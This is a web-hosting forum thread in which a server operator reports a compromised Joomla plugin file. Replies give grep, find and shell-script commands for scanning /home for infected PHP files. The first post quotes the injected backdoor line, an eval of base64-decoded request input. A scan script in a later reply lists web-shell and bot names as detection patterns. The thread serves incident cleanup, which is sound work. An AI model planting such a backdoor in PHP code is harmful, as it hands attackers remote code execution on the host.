Results 1 to 11 of 11
Thread: Find a php cod on all php files
-
03-09-2013, 03:44 AM #1Newbie
- Join Date
- Feb 2013
- Posts
- 12
Find a php cod on all php files
Hi 2 All
I've received a few complaints from the xlhost Datacenter
Subject : TOS Violation - Malicious Activity
Abuse Team,
It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords where compromised and they should be changed to prevent re-infection.
All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
curl -A “Mozilla/4.0” -iL
Please note the HTTP status in the first line of output, if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in consequent lines.
Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
Regards,
Abuse Team
Bank of America
*********************************************************************************************************************************
Examples of Malicious Content
*********************************************************************************************************************************
Malicious content:
xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,
This site is joomla 1.5
I've checked the dvmessages.php file
file Was attached haced file.php file
I examined a normal dvmessages.php file
file Was attached normal file.php file
Differences between two files by hacking the code below
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
i want search this code defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); all users php file to /home folder
please help me
Thanks All
-
03-09-2013, 05:05 AM #2Newbie
- Join Date
- Jun 2011
- Location
- India
- Posts
- 16
Hello Friend,
To find a specific content in different files in a directory, you can use the below command. This command will give a list of files that contains "JEXEC" along with the path to the files.
grep -irl JEXEC /home
You can replace the search content with JEXEC and search.
You can also search like "defined( '_JEXEC' )" ie within "" if its contains spaces.
Please try.
-
03-09-2013, 08:37 AM #3Newbie
- Join Date
- Jul 2009
- Posts
- 12
Hello
I want know XLHost how can find it? please contact and question with theme.
May be theme have finder for this files.
Thank you
-
03-09-2013, 09:42 AM #4Web Hosting Master
- Join Date
- Jul 2009
- Posts
- 1,568
To search all the files of all accounts on the server, use the below command:
for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux
-
03-21-2013, 02:02 PM #5Newbie
- Join Date
- Feb 2013
- Posts
- 12
-
03-21-2013, 02:18 PM #6Web Hosting Master
- Join Date
- May 2012
- Location
- Linux World
- Posts
- 1,137
try this,
find /home/ -type f -name \*.php -exec grep -il "eval(base64_decode($_REQUEST" {} \;Kevin Cheri : Senior Server Administrator / Freelancer : 13+ years Exp, reach me out for any help
Server Optimization Expert / Mysql Guru / Migration Specialist
Skype : lynxmaestro
Gmail : cheri.kevin@gmail.com
-
03-21-2013, 05:05 PM #7WHT Addict
- Join Date
- Aug 2010
- Location
- /bin/bash
- Posts
- 129
You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.
#!/bin/bash
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
cat report.$$When all else fails ... Read the documentation!!!
-
03-22-2013, 02:30 AM #8Newbie
- Join Date
- Jul 2009
- Posts
- 12
Hello
Where can use this?
copy in .sh file and run it?
Receive mail from my data center about this problem.
Dear Sir or Madam,
We have received spam/abuse notification. Please take the necessary
steps to prevent this from happening again in future.
Furthermore, we would request that you provide both ourselves and the
person who has submitted this complaint with a short statement within
24 hours. This statement should include details of the events leading
up to the incident and the steps you are taking to deal with it.
Next steps:
- Solve the problem
- Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link repley to abuse]
- Send your statement to the person making the complaint per email
The details will then be checked by a colleague, who will coordinate
further proceedings. In the event of several complaints, this may
lead to the server being locked.
Important information:
When replying to us, please leave the Abuse ID [AbuseID:000000] in
the subject line unchanged.
Kind regards,
Sandra Betz
Hetzner Online AG
Stuttgarter Straße 1
91710 Gunzenhausen
Tel: + 49 (0)9831 610061
Fax: + 49 (0)9831 61006-2
abuse@hetzner.de
www.hetzner.com
Register Court: Registergericht Ansbach, HRB 3204
Management Board: Dipl. Ing. (FH) Martin Hetzner
Chairwoman of the Supervisory Board: Diana Rothhan
----- attachment -----
Dear Hetzner Abuse Team,
We have been informed of web servers in Germany which were apparently
compromised and are participating in DDoS attacks. Below is the list of
servers that are in your network area. The URL points to scripts that
have apparently been uploaded onto the servers by the attacker.
----- log file -----
IP: my server ip
Script(s):
http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
-
03-22-2013, 02:29 PM #9WHT Addict
- Join Date
- Aug 2010
- Location
- /bin/bash
- Posts
- 129
Hi,
First of all you should disable the following files. Or your DC will suspend your server.
http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
This dvmessages.php seems to be infected and its a part of Joomla plugin. Check the access log for the ip's that accessed the php file and block it. Would be better to suspend the account and reactivate only after updating the Joomla/plugin. Update DC that you have disabled the files, blocked ip's and disabled the website and will enable it only after updating the outdated plugins.
You may check similar files like dvmessages.php using the following command.
updatedblocate dvmessages.php
If you are not sure about this, I would recommend you to hire an administrator who know about this.
For executing the script, just create a file named scan.sh and copy paste the script contents.
Save it.
Provide execute permission using the following.
chmod +x scan.sh
./scan.sh
Cheers!!!When all else fails ... Read the documentation!!!
-
03-23-2013, 10:20 AM #10I Like Beer!
- Join Date
- Sep 2008
- Location
- NL,IR
- Posts
- 1,491
-
03-26-2013, 01:39 AM #11Newbie
- Join Date
- Feb 2013
- Posts
- 12
Hi
how can create a .sh for search whit code
for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;
and save All results and move finde file to another directory sampel path /home/Quarantine
when find .sh file search and file and move to another folder and report scan results
Thank you
Similar Threads
-
Nginx + Centos 5.4 Not displaying PHP - Just downloads PHP files
By CustomNetwork in forum VPS HostingReplies: 9Last Post: 02-10-2013, 02:58 AM -
Looking for a web host that support .cod and .jad files!
By ElFlammable in forum Web HostingReplies: 10Last Post: 11-21-2011, 08:17 AM -
PHP script to convert Video files to Flash files
By DelPierro in forum Programming DiscussionReplies: 12Last Post: 02-02-2011, 03:22 AM -
when php fails dont send php files - apache config
By nand in forum Hosting Security and TechnologyReplies: 2Last Post: 09-24-2005, 04:02 PM -
php & txt files, how can I edit txt files using php?
By dpny in forum Programming DiscussionReplies: 13Last Post: 12-27-2003, 08:08 PM